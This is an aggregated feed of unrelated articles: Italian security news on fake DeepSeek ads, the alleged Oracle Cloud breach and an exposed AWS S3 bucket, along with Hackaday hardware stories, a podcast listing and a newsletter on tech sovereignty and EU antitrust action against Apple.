DeepSeek o DeepScam? Quando Google ti fa scaricare un virus con un click!
La rapida crescita della popolarità di DeepSeek, in mezzo alle controversie sulla privacy, ha attirato l’attenzione non solo degli utenti, ma anche dei criminali informatici. Sono comparsi online falsi annunci pubblicitari camuffati da risultati di ricerca ufficiali di Google nel tentativo di diffondere malware. Gli aggressori prendevano di mira coloro che digitavano query in un motore di ricerca e cliccavano distrattamente sui primi link.
Secondo la ricerca degli specialisti di Malwarebytes, Google Ads ospita attivamente annunci falsi che si spacciano per DeepSeek. A prima vista, le differenze rispetto al risultato reale sono difficili da rilevare, soprattutto per un utente inesperto. Basta cliccare su un link del genere per arrivare a un sito falso, creato con particolare attenzione all’autenticità visiva.
Uno di questi siti copia completamente l’aspetto del DeepSeek ufficiale, ma in realtà porta al download di un Trojan scritto in MSIL (Microsoft Intermediate Language). Il codice dannoso viene attivato quando si tenta di scaricare il “motore di ricerca” e viene avviato sul sistema della vittima.
Sito web falso DeepSeek (Malwarebytes)
I criminali contano sulla credibilità dei risultati sponsorizzati su Google. Il sistema consente a tali annunci di occupare le prime posizioni, superando persino i siti web ufficiali dei marchi. Ciò rende la pubblicità falsa particolarmente pericolosa. I truffatori pagano somme considerevoli per il piazzamento, il che dimostra l’elevata efficacia dell’inganno.
Uno dei siti falsi è stato creato a nome di un inserzionista il cui nome è scritto in ebraico: תמיר כץ. Questo è un altro campanello d’allarme: tali dettagli sono difficili da notare in fretta, soprattutto se l’utente non sa come dovrebbe apparire un vero annuncio DeepSeek.
Informazioni sull’inserzionista di malware (Malwarebytes)
Per prevenire il contagio, gli esperti consigliano di evitare completamente di cliccare sui link sponsorizzati. Inoltre, si consiglia di cliccare sui tre puntini accanto all’URL nei risultati di ricerca: in questo modo è possibile scoprire chi è il proprietario dell’annuncio. Se hai dubbi sul nome dell’inserzionista, è meglio tornare ai risultati di ricerca normali.
Annunci falsi (in alto) e veri DeepSeek (in basso) (Malwarebytes)
Per bloccare completamente i link sponsorizzati, puoi installare un adblocker. In questo modo si eliminerà il rischio di visitare accidentalmente un sito dannoso. In una situazione in cui Google non può garantire la sicurezza degli annunci pubblicitari, tali misure diventano particolarmente rilevanti.
L'articolo DeepSeek o DeepScam? Quando Google ti fa scaricare un virus con un click! proviene da il blog della sicurezza informatica.
Chase Light SAO Shouldn’t Have Used a 555, and Didn’t
Around these parts, projects needlessly using a microcontroller where a simpler design would do are often derided with the catch-all “Should have used a 555,” even if the venerable timer chip wouldn’t have been the ideal solution. But the sentiment stands that a solution more complicated than it needs to be is probably one that needs rethinking, as this completely mechanical chaser light badge Simple Add-On (SAO) aptly demonstrates.
Two thin plates with notches around the edge are sandwiched together inside the 3D printed case of the SAO, between the face and the light source. A small motor and a series of gears rotate the two masks 180° out of phase with each other, which creates the illusion that the light is moving.
It’s pretty convincing; when we first saw the video below, we were sure it was a row of tiny LEDs around the edge of the badge.
Hats off to [Johannes] for coming up with such a clever mechanism and getting it working just in time for Hackaday Europe. If you need to catch up on the talks, we’ve got a playlist ready for you.
youtube.com/embed/bpqRJ9gQvO8?…
Pi Pico Turns Atari 2600 into a Lo-fi Photo Frame
The cartridge based game consoles of decades ago had a relatively simple modus operandi — they would run a program stored in a ROM in the cartridge, and on the screen would be the game for the enjoyment of the owner. This made them simple in hardware terms, but for hackers in the 2020s, somewhat inflexible. The Atari 2600 is particularly troublesome in this respect, with its clever use of limited hardware making it not the easiest to program at the best of times. This makes [Nick Bild]’s Atari 2600 photo frame project particularly impressive.
In the case of this cartridge the ROM is replaced by a Raspberry Pi Pico, which does the job of both supplying the small Atari 2600 program to display the images, and feeding the image data in a form pre-processed for the Atari.
The result is very 8-bit in its aesthetic and barely what you might refer to as photos at all, but on the other hand making the Atari do this at all is something of a feat. Everything can be found in a GitHub repository.
If new hardware making an old console perform unexpected tricks is your bag, we definitely have more for you.
youtube.com/embed/uxBHm1ROvYI?…
DK 9x24 - 23AndMe
23AndMe, il servizio di mappatura genetica ricreativa, dichiara bancarotta. Il Procuratore Generale della California pubblica un appello a tutti i californiani perché, ai sensi della loro legge sulla privacy, chiedano a 23AndMe la cancellazione dei propri dati. Come mai? Dove sta il problema?
spreaker.com/episode/dk-9x24-2…
Il Giallo dell’attacco ad Oracle Cloud continua tra CVE, handle sull’Internet Archive e Meme
La scorsa settimana, un threat actors di nome ‘rose87168’ ha affermato di aver violato i server Oracle Cloud e di aver iniziato a vendere i presunti dati di autenticazione e le password crittografate di 6 milioni di utenti.
L’autore della minaccia ha anche affermato che le password SSO e LDAP rubate potevano essere decriptate utilizzando le informazioni nei file rubati e si è offerto di condividere alcuni dei dati con chiunque potesse aiutarli a recuperarli. La posizione di Oracle è stata quella di negare la violazione dei suoi server di accesso SSO federati Oracle Cloud e il furto dei dati degli account di 6 milioni di persone.
Molte aziende hanno confermato che i campioni di dati condivisi dall’autore della minaccia erano validi. Oracle ha dichiarato: “Non c’è stata alcuna violazione di Oracle Cloud. Le credenziali pubblicate non sono per Oracle Cloud. Nessun cliente Oracle Cloud ha subito una violazione o ha perso dati”.
126.687 domini colpiti dalla presunta violazione
Le aziende hanno dichiarato che i nomi visualizzati LDAP associati, gli indirizzi e-mail, i nomi propri e altre informazioni identificative erano tutti corretti e appartenevano a loro. L’attore della minaccia ha rilasciato più file di testo costituiti da un database, dati LDAP e un elenco di 140.621 domini di aziende che sarebbero state colpite dalla violazione (126.687 effettuando una group by). Va notato che alcuni dei domini aziendali sembrano di test e ci sono più domini per azienda. Per quanto riguarda le aziende italiane, abbiamo ben 1938 record all’interno dei domini colpite dalla presunta violazione (1806 effettuando un raggruppamento).
Inoltre l’autore della minaccia sostiene di aver avuto uno scambio di email con Oracle per segnalare di aver hackerato i server. “Ho esaminato attentamente l’infrastruttura della dashboard cloud e ho trovato un’enorme vulnerabilità che mi ha consentito di accedere in modo completo alle informazioni di 6 milioni di utenti”, si legge nell’e-mail che è stata visionata da BleepingComputer.
Cloudsek, come abbiamo visto nel precedente articolo, ha anche trovato un URL di Archive.org che mostra che il server “login.us2.oraclecloud.com” eseguiva Oracle Fusion Middleware 11g a partire dal 17 febbraio 2025. Da allora Oracle ha disattivato questo server dopo che è stata segnalata la notizia della presunta violazione.
Questa versione del software è stata interessata da una vulnerabilità tracciata come CVE-2021-35587 che sembrerebbe aver consentito di compromettere Oracle Access Manager. L’autore della minaccia ha affermato che questa vulnerabilità è stata utilizzata nella presunta violazione dei server Oracle.
Il file x.txt registrato nell’Internet Archive
La vulnerabilità utilizzata per questa presunta violazione sembra essere il CVE-2021-35587 che ha consentito la compromissione del server login[.]us2[.]oraclecloud[.]com. Oracle dopo aver negato l’attacco ha rapidamente disconnesso il server da Internet.
L’aggressore sostiene inoltre di aver lasciato un file con un nome handle, “x.txt”, scritto al suo interno quando ha violato il server “login.us2.oraclecloud[.]com” e che questo è stato scansionato e registrato nell’Internet Archive il 1° marzo 2025.
Questa vicenda, ancora avvolta nel mistero, non ha una chiara spiegazione. È certo che un gigante come Oracle stia ancora analizzando i fatti e presto pubblicherà un report ufficiale per fare luce sull’accaduto. Nel frattempo, c’è chi affronta la situazione con ironia, diffondendo meme che, almeno dagli elementi in nostro possesso, sembrano essere condivisibili.
rose87168 is shopping around for interest owners wanting to validate the @Oracle Cloud breach. It’s all about to finalize soon…Oracle: pic.twitter.com/Smx05YP2yt
— Ido Naor 🇮🇱 (@IdoNaor1) March 25, 2025
L'articolo Il Giallo dell’attacco ad Oracle Cloud continua tra CVE, handle sull’Internet Archive e Meme proviene da il blog della sicurezza informatica.
Una configurazione errata di AWS S3, porta alla divulgazione di 86.000 operatori sanitari in 29 stati degli Stati Uniti
Di recente, si è verificata una grave perdita di dati presso ESHYFT, un’azienda di tecnologia sanitaria nel New Jersey, USA.
Le informazioni sensibili di oltre 86.000 operatori sanitari sono state esposte pubblicamente a causa di un bucket di archiviazione AWS S3 configurato in modo errato. Il ricercatore di sicurezza informatica Jeremiah Fowler ha scoperto che circa 108,8 GB di dati nel bucket non erano protetti da password o crittografati, lasciando le informazioni personali di un gran numero di operatori sanitari accessibili al pubblico.
Le informazioni sensibili trapelate includono informazioni di identificazione personale (PII), come foto del volto, orari di lavoro, certificati professionali, documenti medici, ecc., alcune delle quali potrebbero essere protette dall’Health Insurance Portability and Accountability Act (HIPAA) degli Stati Uniti. I dati riguardano personale sanitario di 29 stati, tra cui infermieri, assistenti infermieristici, ecc., il che comporta enormi rischi per la privacy del personale interessato.
Durante l’indagine, Fowler ha scoperto che una cartella denominata “App” nel bucket S3 archiviava 86.341 record, tra cui immagini facciali degli utenti, registri mensili della programmazione dei lavori in formato CSV, contratti di lavoro, curriculum, ecc.
Un foglio di calcolo conteneva più di 800.000 voci che dettagliavano gli ID interni degli infermieri, i luoghi di lavoro, le date e gli orari dei turni e gli orari di lavoro, fornendo un quadro completo delle attività degli operatori sanitari.
Ancora più grave è che nel contenitore di archiviazione ci sono anche alcuni documenti medici utilizzati per dimostrare l’assenza o il congedo per malattia. Questi documenti contengono informazioni su diagnosi, prescrizione e trattamento, che potrebbero includere contenuti protetti da HIPAA.
Dopo aver scoperto il bucket S3 esposto, Fowler ha immediatamente inviato una notifica di divulgazione responsabile a ESHYFT, seguendo il protocollo standard dei ricercatori di sicurezza. Tuttavia, nonostante l’estrema delicatezza dei dati, l’accesso pubblico al database è stato limitato più di un mese dopo la notifica iniziale.
Dopo aver ricevuto la notifica, ESHYFT ha risposto solo con una breve dichiarazione: “Grazie! Stiamo indagando attivamente e cercando una soluzione.” Non è chiaro se il bucket S3 sia stato gestito direttamente da ESHYFT o tramite un appaltatore terzo.
Non ci sono inoltre informazioni su quanto a lungo i dati siano stati esposti prima di essere scoperti, o se vi sia stato un accesso non autorizzato da parte di terzi durante il periodo di esposizione.
L'articolo Una configurazione errata di AWS S3, porta alla divulgazione di 86.000 operatori sanitari in 29 stati degli Stati Uniti proviene da il blog della sicurezza informatica.
Why are Micro Center Flash Drives so Slow?
Every year, USB flash drives get cheaper and hold more data. Unfortunately, they don’t always get faster. The reality is, many USB 3.0 flash drives aren’t noticeably faster than their USB 2.0 cousins, as [Chase Fournier] found with the ultra-cheap specimens purchased over at his local Micro Center store.
Although these all have USB 3.0 interfaces, they transfer at less than 30 MB/s, but why exactly? After popping open a few of these drives the answer appears to be that they use the old-style Phison controller (PS2251-09-V) and NAND flash packages that you’d expect to find in a USB 2.0 drive.
Across the 32, 64, and 256 GB variants the same Phison controller is used, but the PCB has provisions for both twin TSOP packages or one BGA package. The latter package turned out to be identical to those found in the iPhone 8. Also interesting was that the two 256 GB drives [Chase] bought had different Phison chips, as in one being BGA and the other QFP. Meanwhile some flash drives use eMMC chips, which are significantly faster, as demonstrated in the video.
It would seem that you really do get what you pay for, with $3 “USB 3.0” flash drives providing the advertised storage, but you really need to budget in the extra time that you’ll be waiting for transfers.
youtube.com/embed/4avbFmmMFs8?…
Fitting a Spell Checker into 64 kB
By some estimates, the English language contains over a million unique words. This is perhaps overly generous, but even conservative estimates generally put the number at over a hundred thousand. Regardless of where the exact number falls between those two extremes, it’s certainly many more words than could fit in the 64 kB of memory allocated to the spell checking program on some of the first Unix machines. This article by [Abhinav Upadhyay] takes a deep dive on how the early Unix engineers accomplished the feat despite the extreme limitations of the computers they were working with.
Perhaps the most obvious way to build a spell checker is by simply looking up each word in a dictionary. With modern hardware this wouldn’t be too hard, but disks in the ’70s were extremely slow and expensive. To move the dictionary into memory it was first whittled down to around 25,000 words by various methods, including using an algorithm to remove all affixes, and then using a Bloom filter to perform the lookups. The team found that this wasn’t a big enough dictionary size, and had to change strategies to expand the number of words the spell checker could check. Hash compression was used at first, followed by hash differences and then a special compression method which achieved an almost theoretically perfect compression.
Although most computers that run spell checkers today have much more memory as well as disks which are orders of magnitude larger and faster, a lot of the innovation made by this early Unix team is still relevant for showing how various compression algorithms can be used on data in general. Large language models, for one example, are proving to be the new frontier for text-based data compression.
Integrated BMS Makes Battery Packs Easy
Lithium technology has ushered in a new era of batteries with exceptionally high energy density for a reasonably low cost. This has made a lot possible that would have been unheard of even 20 years ago such as electric cars, or laptops that can run all day on a single charge. But like anything there are tradeoffs to using these batteries. They are much more complex to use than something like a lead acid battery, generally requiring a battery management system (BMS) to keep the cells in tip-top shape. Generally these are standalone systems but [CallMeC] integrated this one into the buswork for a battery pack instead.
The BMS is generally intended to make sure that slight chemical imbalances in the battery cells don’t cause the pack to wear out prematurely. They do this by maintaining an electrical connection to each cell in the battery so they can charge them individually when needed, making sure that they are all balanced with each other. This BMS has all of these connections printed onto a PCB, but also included with the PCB is the high-power bus that would normally be taken care of by bus bar or nickel strips. This reduces the complexity of assembling the battery and ensures that any time it’s hooked up to a number of cells, the BMS is instantly ready to go.
Although this specific build is meant for fairly large lithium iron phosphate batteries, this type of design could go a long way towards making quick battery packs out of cells of any type of battery chemistry that typically need a BMS system, from larger 18650 packs or perhaps even larger cells like those out of a Nissan Leaf.
3D-Printed Scanner Automates Deck Management for Trading Card Gamers
Those who indulge in trading card games know that building the best deck is the key to victory. What exactly that entails is a mystery to us muggles, but keeping track of your cards is a vital part of the process, one that this DIY card scanner (original German; English translation) seeks to automate.
At its heart, [Fraens]’ card scanner is all about paper handling, which is always an engineering task fraught with peril. Cards like those for Magic: The Gathering and other TCGs are meant to be handled by human hands, and automating the task of flipping through them presents some challenges. [Fraens] uses a pair of motorized 3D-printed rollers with O-rings to form a conveyor belt that can pull one card at a time off the bottom of a deck. An adjustable retaining roller made from the most adorable linear bearing we’ve ever seen ensures that only one card at a time is pulled from the hopper onto an imaging platen. An adjustable mount holds a smartphone to take a picture of the card, which is fed into an app that extracts all the details and categorizes the cards in the deck.
Aside from the card handling mechanism, there are some pretty slick details to this build. The first is that [Fraens] noticed that the glossy finish on some cards interfered with scanning, leading him to add a diffused LED ringlight to the rig. If an image isn’t scannable, the light goes through a process of dimming and switching colors until a good scan is achieved. Also, to avoid the need to modify the existing TCG deck management app, [Fraens] added a microphone to the control side of the scanner that listens for the sounds the app makes when it scans cards. And if Magic isn’t your thing, the basic mechanism could easily be modified to scan everything from business cards to old family photos.
youtube.com/embed/dl2RyKrg4pI?…
FLOSS Weekly Episode 826: Fedora 42 and KDE
This week, Jonathan Bennett chats with Neal Gompa about Fedora 42 and KDE! What’s new, what’s coming, and why is flagship status such a big deal?
- Website: neal.gompa.dev/
- GitHub Sponsors: github.com/sponsors/Conan-Kudo
- Neal’s business (Velocity Limitless): velocitylimitless.com/
- Neal’s podcast (Sudo Show): tuxdigital.com/sudoshow
youtube.com/embed/xwgqPwsjd0g?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/03/26/floss-…
Supercon 2024: A New World of Full-Color PCBs
Printed circuit boards were once so simple. One or two layers of copper etched on a rectangular fiberglass substrate, with a few holes drilled in key locations so components could be soldered into place. They were functional objects, nothing more—built only for the sake of the circuit itself.
Fast forward to today, and so much has changed. Boards sprout so many layers, often more than 10, and all kinds of fancy geometric features for purposes both practical and pretty. But what catches they eye more than that, other than rich, saturated color? [Joseph Long] came to the 2024 Hackaday Supercon to educate us on the new world of full color PCBs.
youtube.com/embed/LOSMH_EV6pQ?…
[Joseph] begins his talk with an explanation of terminology. We often look at a PCB and cite its color—say, green for example. As [Joseph] explains, the color comes from the solder mask layer—so called for its job in ensuring solder can only go where it’s supposed to go. The solder mask sits atop the copper layer, but beneath the silk screen which has all the component outlines and part labels.
Solder mask was traditionally green, and this is still the most common color you’ll find in the majority of electronics. However, in recent decades, the available gamut of colors has increased. Now, you can routinely order yellow, blue, purple, and red solder masks quite easily, as well as black or white if you’re so inclined. As some creative makers have found, when designing a board, it’s possible to get several colors into a design even if you’re just using one color of solder mask. That’s because the solder mask appears in slightly different shades when it’s laid over the bare fiberglass of the PCB, versus being laid over copper, for example. Add in white silkscreen and you’ve got quite a lot to work with.
PCB Color Palette
byu/Half_Slab_Conspiracy inPrintedCircuitBoard
Different colors are achievable on a PCB even just by using a single soldermask color.
But what if you want more? What if you want real color? [Joseph] realized this could be possible when he found out that PCB board houses were already using inkjet-like printers to lay down silkscreen layers on small-run boards. Since there was already a printer involved in the board production process, wouldn’t it be simple to start printing on circuit boards in full color?
As it turns out, this was very practical. Two big Shenzhen board houses—JLCPCB and PCBWay—both started delivering color printed boards in 2024. The method involved using a white solder mask layer, with a full-color “silkscreen” layer printed on top using UV-cured ink. Using this ink was a particular key to unlocking full color PCBs. The UV-cured inks are more robust under the tough conditions PCBs face, such as the high temperatures during reflow or hand soldering.
Color printing PCBs might sound trivial and only relevant for cosmetic purposes, but [Joseph] points out it has lots of practical applications too. You can easily color code pinouts and traces right on the the board, a feature that has obvious engineering value. You can even use photorealistic footprints to indicate where other board-level modules should be soldered in, too, making assembly more intuitive. Plus, full color boards are fun—don’t discount that!
As a bonus, we even get to see some of Joseph’s awesome color boards. The graphics are stunning—they really show the potential of full-color PCBs and how they can elevate a project or a fun badge design. If you’re eager to try this out, go ahead and watch [Joseph]’s primer and dive in for yourself!
Teardown of Casio Credit Card-Sized Radio
These days we don’t get too fussed about miniaturized electronics, not when you can put an entire processor and analog circuitry on a chip the size of a grain of sand. Things were quite different back in the 1980s, with the idea of a credit card-sized radio almost preposterous. This didn’t stop the engineers over at Casio from having a go at this and many other nutty ideas, with [Matt] from Techmoan having a go at taking one of these miniaturized marvels apart.
On the chopping block is the FM stereo device that was featured in a previous episode. Out of the four credit card-sized radios in that video, the one with the rechargeable battery (obviously) had ceased to work, so it was the obvious choice for a teardown. This mostly meant peeling off the glued-on top and bottom, after which the circuitry became visible.
In addition to the battery with a heavily corroded contact, the thin PCB contains a grand total of three ICs in addition to the analog circuitry. These were identified by [Spritetm] as an AM/FM tuner system IC (TA7792), an FM PLL MPX (TA7766AF) and a headphone amplifier (TA7767F), all of them manufactured by Toshiba.
Although [Matt] reckons this was a destructive teardown, we’re looking forward to the repair video where a fresh cell is soldered in and the case glued back together.
youtube.com/embed/XX_wOOvByPs?…
Tech in Plain Sight: Hearing Aids
You might think you don’t need a hearing aid, and you might be right. But in general, hearing loss eventually comes to all of us. In fact, you progressively lose hearing every year, which is why kids can have high-pitched ringtones their parents can’t hear.
You’d think hearing aids would be pretty simple, right? After all, we know how to pick up sounds, amplify them, and play them back. But there’s a lot more to it. Hearing aids need to be small, comfortable, have great battery life, and cram a microphone and speaker into a small area. That also can lead to problems with feedback, which can be very uncomfortable for the user. In addition, they need to handle very soft and loud sounds and accommodate devices like telephones.
Although early hearing aids just made sound louder and, possibly, blocked unwanted sound, modern devices will try to increase volume only in certain bands where the user has hearing loss. They may also employ sophisticated methods to block or reduce noise.
A Brief History
Hearing loss is nothing new. Ear trumpets appeared around the 17th century. These were just simple sound baffles that directed sound to your ear and, perhaps, cut some noise out that wasn’t in the trumpet’s direction.
The modern hearing aid dates back to the akouphone in 1895. [Miller Hutchison] developed the device for a friend who was deaf from a bout of scarlet fever. It was bulky — sitting on a table top — and used a carbon microphone, but it did work. He was also able to sell several models to royalty, many of whom suffered from hereditary deafness. This included Denmark’s Queen Alexandra, who, reportedly, was very impressed with the results.
Around 1902, [Hutchison] changed the device’s name to the acousticon, making it more portable with battery power. Despite impressive marketing, not all medical professionals were sold. If you were totally deaf, the device did nothing, unsurprisingly. In addition, the bulky batteries required frequent replacement, and the frequency response was poor.
It was still better than nothing, and the invention also led to the massacon and akoulalion that converted sound into vibration for the profoundly deaf. He later sold the rights for the acousticon to [Kelley Turner], who would not only improve the device, but also use the technology to launch the dictograph, which was a well-known office machine for many years.
Modern Times
Keep in mind that portable hearing aids in the 1920s was a relative term. Typically, you’d have a unit carried in a bag or hung around your neck. World War II brought advances in minaturization which benefited hearing aids like the Zenith Miniature 75.
Transistors, of course, changed everything, including hearing aids. The Sonotone 1010, which appeared in 1952, used both transistors and tubes. Early transistor units were known to fail early due to moisture and heat. Silicon transistors and encapsulation helped.
Naturally, all of these hearing aids were analog as were the earliest IC-based devices. However, with the advent of ICs, it was possible to use digital techniques.
The path to digital hearing aids was difficult. In the 1970s, large computers could program digital elements in hearing aids to tune the device to set frequency bands and gains.
By 1980, several groups were experimenting with real digital hearing aids, although many of them had wireless links to real computers. A fully digital hearing aid first appeared in a 1984 patent, but it wasn’t tiny. Since then, things have gotten smaller and more capable.
Physical Form
Hearing aids went from table-top devices, to boxes hanging on necks. Getting smaller devices allowed for small boxes that hug the back of the ear with the earpiece into the ear canal.
With even smaller devices, the entire apparatus can be placed in the ear canal. Many of these go so deeply into the ear that they are largely invisible. There are also hearing aids that can surgically attach to your skull using a titanium post embedded in the bone. This can transmit sound even to people who can’t hear sound directly since it relies on bone conduction.
Other places to find hearing aids are built into thick glasses frames. Doctors with hearing problems can opt for stethoscopes with integrated hearing aids.
Modern hearing aids sometimes have rechargeable batteries. Otherwise, there will be some kind of small battery. There was a time that mercury cells were common, but with those banned in most places, many aids now take zinc-air batteries that deliver about 1.4 V.
We hear from an 8th grader that you can make hearing aid batteries last longer by peeling the sticker from them and waiting five minutes before installing them. Apparently, giving them a little time to mix with the air helps them.
What’s Next?
On the market today are hearing aids that use neural networks, have Bluetooth connections, and use other high tech tricks. We’ve looked at the insides of a hearing aid and why they cost so much before. If you want to roll your own, there is an open source design.
Rethinking tech sovereignty
SUPPORTED BY
THIS IS DIGITAL POLITICS. I'm Mark Scott, and continued my Euro-trash existence this week in Geneva where I'm moderated a panel on March 24 on tech sovereignty and data governance. I'll include a write-up in next week's newsletter.
Talking of events, I'll also be co-hosting a tech policy meet-up in hipster East London on March 27 at 6:30pm. There are a few spots left for this (free) event. Sign up here.
— We're living through an era of 'tech sovereignty.' No one knows what that concept means — and that's quickly turning into a problem.
— Brussels forced Apple to open up to competitors. That's going to help many US firms that, in principle, oppose the bloc's competition revamp.
— In what must be the least-shocking fact about the latest AI models, almost none of the data used to train these systems comes from Global Majority countries.
Let's get started.
Tech sovereignty in an era of zero-sum geopolitics
MAYBE IT'S BECAUSE I WAS IN SWITZERLAND to talk about this topic, but we need to focus on tech sovereignty. Bear with me. For most of us, this concept is either unknown or irrelevant. Or possibly both. But over the last five years, policymakers and lawmakers — first in Europe, but increasingly everywhere — have embraced this catch-all term for efforts by individual governments to regain control over parts of the technology industry that have historically been left to the private sector.
Think the United States (or European Union) Chips Act, or efforts to bring back high-end semiconductor manufacturing to the "homeland." Think Washington's Joe Biden-era export controls to stop Beijing getting hold of next generation chip manufacturing equipment. Think Brussels' litany of initiatives — from the creation of so-called 'data spaces' to the (badly named) AI 'gigafactories' — to give itself a seat at the global table of tech powers.
At its core, tech sovereignty is a realization by elected officials that they are no longer in control. They see complex technological global supply chains, the rise of world-spanning tech giants and the influx of billions of dollars in private capital and worry their voters (and homegrown companies) won't see the economic and social benefits of how tech has become so ingrained in everything from buying a car to sending your child to school.
Well, maybe that's one (slightly cynical) definition. After more than five years since 'tech sovereignty' became a thing, governments are still grappling with exactly what it means, how to implement it and what the consequences will be when everyone from London to Brasilia wants to "onshore" tech to boost their local interests.
Before 2025, that remained almost exclusively a headache for uber-policy types (like myself.) But this year has shown, already, that we are living in a more transactional, zero-sum mercantilist world where all elected leaders — and not just US President Donald Trump — are willing to use all the levers at their disposal to reshape the world order to their needs.
**A message from Microsoft** Each day, millions of people use generative AI. Abusive AI-generated content, however, can present risks to vulnerable groups such as women, children, and older adults. In a new white paper, developed in consultation with civil society, we present actionable policy recommendations to promote a safer digital environment.**
That means, inevitably, revisiting how we define 'tech sovereignty' because, like it or not, how we collectively approach the topic will have significant real-world implications for how technology is developed, governed and used in the years to come.
If done well, it could build upon the core tenets of what made the internet such a game-changing technology: open, rights-based core infrastructure that allowed anyone (read: with money and technical capacity) to build whatever they wanted, however they wanted.
If done poorly, it could undermine those key principles that have made technology crucial to both economic and social benefits for all.
Case in point: if a country decides to keep all of its citizens' data within national borders — a term known as data localization — for either commercial or national security reasons, then it makes it harder to trade, based on a reduction of global data flows, and starts to cut off specific countries from the now-fraying world order. This is not hypothetical: Russia, Nigeria, India and China are among states that already have such rules on the books.
What is urgently needed is an honest conversation about what people mean by 'tech sovereignty.' Currently, that falls into two camps.
Camp One leans toward isolationism. In this world, politicians funnel public cash into homegrown 'tech champions' that use siloed-off local data and technical skills to create services/products that are then sold worldwide in a race to build global giants.
Camp Two relies on each country shifting to tech-related areas where it can compete globally (eg: Taiwan/South Korea on microchips; Vietnam on device manufacturing), and then opening up each market to overseas competition. The goal isn't to own everything in tech. It's about figuring out where you can compete, globally, while giving local citizens access to (cheap) outside services/products that improve their daily lives.
You can probably figure out which version of 'tech sovereignty' would be my preference.
Before I get angry emails, I realize there's a lot of nuance that lies between those two extreme positions. Those who want to create a so-called "Euro stack," for instance, would probably argue their efforts are about giving Europe greater autonomy at a time when the US is not perceived as a trusted partner. Those in Brazil supportive of the country's data localization mandate would likely say such provisions are about keeping local's personal information safe under national laws.
I get it. Everyone has a reason why their version of "tech sovereignty" is OK, while everyone else's take is blatant protectionism.
Thanks for reading Digital Politics. If you've been forwarded this newsletter (and like what you've read), please sign up here. For those already subscribed, reach out on digitalpolitics@protonmail.com
But here's the problem with that. This ongoing nibbling at what has made technology an inherent force for good (despite, ahem, some significant downsides) has placed increased onus on equating national power as the only mechanism to get things done. That is especially true, in 2025, when long-standing allies are starting to not trust each other, and retaliatory tariffs are leading us toward a potential global trade war.
What I would prefer to see is a recognition by lawmakers about what they can — and what they can not — change when it comes to tech. Yes, much of the current global power dynamics mean the likes of the US, China and Europe have more say than other parts of the globe. That is not something, unfortunately, that will change overnight.
But while it's 100 percent legitimate for national leaders to want greater control of various forms of technology, I don't see how the ubiquitous calls to spend public money to "bring back" global supply chains to national shores as something that will achieve that.
First, it won't — given that these complex systems have grown over decades and won't just change quickly. And second, it will lead to short-term higher prices for consumers because of the inevitable cost hikes that will result from spending over the odds to onshore manufacturing when other countries can just do it cheaper (and faster.)
"Tech sovereignty" is a concept that sounds good as a talking point, but fails to deliver when confronted with reality. Yes, some form of greater control (or, at least, the semblance of control) over global tech forces is probably good for democracy, writ large. That's especially true for countries beyond the US and China that are net-takers of technology, at a global stage.
But you don't achieve that by putting up barriers to outsiders and investing public funds to develop clunky national champions that will struggle to compete worldwide.
What would be better is to set out a positive definition of 'tech sovereignty' that builds on what has worked for almost everyone over the last 80 years. Caveat: I understand that is a difficult pitch, politically, given the current geopolitical climate.
That would include: reaffirming open global markets based on right-based digital regulation that allows each country to 1) promote their own unique tech-related specialisms, both home and abroad and 2) allow national lawmakers to step in, where appropriate, when global tech forces undermine the rule of law or other key tenets within a nation state.
We already have such systems in other sectors like financial services and pharmaceuticals — and no one (at least not yet in 2025!) makes much political capital in undermining how those industries currently operate. Yes, tech is somewhat different as it's nominally not a separate industry. But, I would argue, neither is financial services.
Unfortunately, I don't see that positive agenda in any of the ongoing 'tech sovereignty' discussions that have become embedded in the geopolitical tensions of early 2025. That goes from Trump's MAGA approach to maintaining "US dominance" over AI to European Commission president Ursula von der Leyen's pitch to make the EU the hub for the next technological revolution.
That is a shame.
It's a shame because it undermines what has been built over the last 80 in so many tech-related fields that have benefited so many people worldwide. And it's a shame because it equally foretells a growing "splinternet" between countries/regions that solely focus on their short-term interests — without recognizing what damage that will produce over the mid-term.
Chart of the Week
THE LATEST ARTIFICIAL INTELLIGENCE MODELS already skew toward more developed countries. But researchers analyzed the most common datasets used to build these systems, from 1990 to 2024, to figure out where that information actually came from.
Not surprisingly, regions like Africa and South America were massively underrepresented, both on the number of datasets (see "by count" below) from those regions and the amount of information (see "by tokens or hours" below) included from those parts of the world.
That's a problem when next generation AI models are being rolled out globally in ways that won't meet regionally-specific needs because of a lack of local data baked into these complex systems.
The darker the part of the maps below, the more data was used from that region to train AI models.
The complexities of antitrust enforcement
WHEN THE EUROPEAN COMMISSION ANNOUNCEDlast week it had forced Apple to make changes to comply with the bloc's new competition rules, the iPhone maker was quick to cry foul. The decision, according to the company, "wraps us in red tape, slowing down Apple's ability to innovate for users in Europe and forcing us to give away our new features for free to companies who don't have to play by the same rules."
Yet in many parts of the global tech world — including inside companies that equally dislike the EU's Digital Markets Act— there were cheers of victory. The split response highlights how these new competition rules, which allow European regulators to step into online markets before one specific company becomes too dominant, aren't as easy to define as many first thought.
First, a quick backstory. Last year, the European Commission's competition enforcers opened an investigation into how Apple allowed rival firms to interact with its products. On March 19, Brussels then ordered the iPhone maker to make it easier for non-Apple devices to connect to the company's products. It also demanded the Cupertino-based firm to provide its technical specs to outsiders so they could build services which more easily interact with Apple's operating systems.
**A message from Microsoft**New technologies like AI supercharge creativity, business, and more. At the same time, we must take steps to ensure AI is resistant to abuse. Our latest white paper, "Protecting the Public from Abusive AI-Generated Content across the EU," highlights the weaponization of women’s nonconsensual imagery, AI-powered scams and financial fraud targeting older adults, and the proliferation of synthetic child sexual abuse.
The paper outlines steps Microsoft is taking to combat these risks and provides recommendations as to how the EU's existing regulatory framework can be used to combat the abuse of AI-generated content by bad actors. We thank Women Political Leaders, the MenABLE project, the Internet Watch Foundation, the WeProtect Global Alliance, and the European Senior’s Union for their important work and support. Click here to read more.**
What does that mean? Over the next 12 months (caveat: Apple may still appeal these changes), it will become easier, say, for Garmin smartwatches to connect seamlessly with your iPhone — just as an Apple watch currently does. Rival apps will also be able to take advantage of Apple's technical wizardry to compete more directly with the company's own services that work hand-in-glove with its in-house software.
